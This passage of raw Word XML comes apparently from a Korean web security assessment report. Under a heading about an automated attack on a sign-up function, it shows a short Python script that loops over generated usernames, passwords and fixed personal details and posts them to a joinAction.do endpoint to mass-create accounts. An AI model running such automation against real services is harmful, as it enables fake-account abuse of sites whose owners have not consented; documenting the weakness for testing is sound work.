      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>회원가입</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4259D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 기능 자동화 공격</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9187"/>
      </w:tblGrid>
      <w:tr w:rsidR="0005673F" w14:paraId="34CE373F" w14:textId="77777777" w:rsidTr="00447E2D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9187" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6C96E151" w14:textId="741F0EE8" w:rsidR="0005673F" w:rsidRPr="00A779DB" w:rsidRDefault="0005673F" w:rsidP="0005673F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A779DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>•</w:t>
            </w:r>
            <w:r w:rsidRPr="00A779DB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> VS code 디버그 콘솔</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CA90134" w14:textId="21AFB3F1" w:rsidR="0005673F" w:rsidRPr="00EE1712" w:rsidRDefault="0005673F" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>import requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A9FFCB5" w14:textId="77777777" w:rsidR="0005673F" w:rsidRPr="00EE1712" w:rsidRDefault="0005673F" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="16AE9D46" w14:textId="77777777" w:rsidR="0005673F" w:rsidRPr="00EE1712" w:rsidRDefault="0005673F" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t># 기본 정보 설정</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43D4410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base_url = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40CF5EAB" w14:textId="77777777" w:rsidR="0005673F" w:rsidRPr="00EE1712" w:rsidRDefault="0005673F" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>join_url = f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>{base_url}/joinAction.do</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E6F97A4" w14:textId="77777777" w:rsidR="0005673F" w:rsidRPr="00EE1712" w:rsidRDefault="0005673F" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4A196065" w14:textId="77777777" w:rsidR="0005673F" w:rsidRPr="00EE1712" w:rsidRDefault="0005673F" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>user_ids = [f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>ttestuser{i}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> for i in range(1, 10)]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A93D93C" w14:textId="77777777" w:rsidR="0005673F" w:rsidRPr="00EE1712" w:rsidRDefault="0005673F" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>passwords = [f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>tTestuser{i}!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> for i in range(1, 10)]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2501A4C5" w14:textId="77777777" w:rsidR="0005673F" w:rsidRPr="00EE1712" w:rsidRDefault="0005673F" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B1AE877" w14:textId="77777777" w:rsidR="0005673F" w:rsidRPr="00EE1712" w:rsidRDefault="0005673F" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t># 고정값</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62550155"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zip_code = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>12345</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72210D7E"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addr1 = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>서울시 강남구</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="790F7F0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birth_year = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>1995</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62890AE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birth_month = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E7343C3"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birth_day = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66FB6A8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phone_base = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>01012340</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5631A87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email_domain = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>gmail.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A18894A" w14:textId="77777777" w:rsidR="0005673F" w:rsidRPr="00EE1712" w:rsidRDefault="0005673F" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2A57AE3B" w14:textId="77777777" w:rsidR="0005673F" w:rsidRPr="00EE1712" w:rsidRDefault="0005673F" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>for i in range(5):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00C3D8D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user_id = user_ids[i]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7461730F"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passwd = passwords[i]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5987FBF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email = f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>{user_id}@{email_domain}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D9045F" w14:textId="77777777" w:rsidR="0005673F" w:rsidRPr="00EE1712" w:rsidRDefault="0005673F" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="308996B7"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data = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2967BB08"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MEMBER_ID</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>: user_id,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B7EDF8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MEMBER_NAME</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테스트{i+1}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D50F0D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MEMBER_PASSWD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>: passwd,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4533480F"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MEMBER_PASSWD2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>: passwd,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B6041E3"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MEMBER_ZIPCODE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>: zip_code,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16CC848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MEMBER_ADDR1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>: addr1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F04C11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MEMBER_ADDR2</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101-{i+1}호</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3470D3AB"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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>: birth_year,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67751D1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MEMBER_BIRTH2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>: birth_month,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E8D5C4"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MEMBER_BIRTH3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>: birth_day,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="095D89B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MEMBER_PHONE</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{phone_base}{i+1:02}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6478C5DC"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MEMBER_EMAIL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>: user_id,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="084B725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MEMBER_EMAIL2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>: email_domain,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="516E899C" w14:textId="77777777" w:rsidR="0005673F" w:rsidRPr="00EE1712" w:rsidRDefault="0005673F" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>SMS_AGREE</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1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18A2183D"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EMAIL_AGREE</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1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D88AB9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check1</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r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F2B61A7"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check2</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r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E4DF412"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check3</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p>
          <w:p w14:paraId="6F993D6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p>
          <w:p w14:paraId="64D5F468" w14:textId="77777777" w:rsidR="0005673F" w:rsidRPr="00EE1712" w:rsidRDefault="0005673F" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F0E1F0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response = requests.post(join_url, data=data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BC878C6" w14:textId="77777777" w:rsidR="0005673F" w:rsidRDefault="0005673F" w:rsidP="00C443D0">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:keepNext/>
              <w:ind w:leftChars="0" w:left="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    print(f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>회원가입 요청 - {user_id}: 상태 코드 {response.status_code}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE1712">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71DA7162" w14:textId="09B44788" w:rsidR="00CE038B" w:rsidRDefault="00C443D0" w:rsidP="00CE038B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="431" w:name="_Toc209094678"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[코드]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8</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>회원가입 자동화 코드</w:t>
      </w:r>
      <w:bookmarkEnd w:id="431"/>
    </w:p>
    <w:p w14:paraId="07BF8C9F" w14:textId="77777777" w:rsidR="00CE038B" w:rsidRDefault="00CE038B" w:rsidP="00CE038B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B81BA80" w14:textId="643CB383" w:rsidR="00B71A2E" w:rsidRDefault="00B71A2E" w:rsidP="00CE038B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F820799" wp14:editId="377F425C">
            <wp:extent cx="4572000" cy="763636"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="17780"/>
            <wp:docPr id="1444393999" name="그림 144439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739" b="42217"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
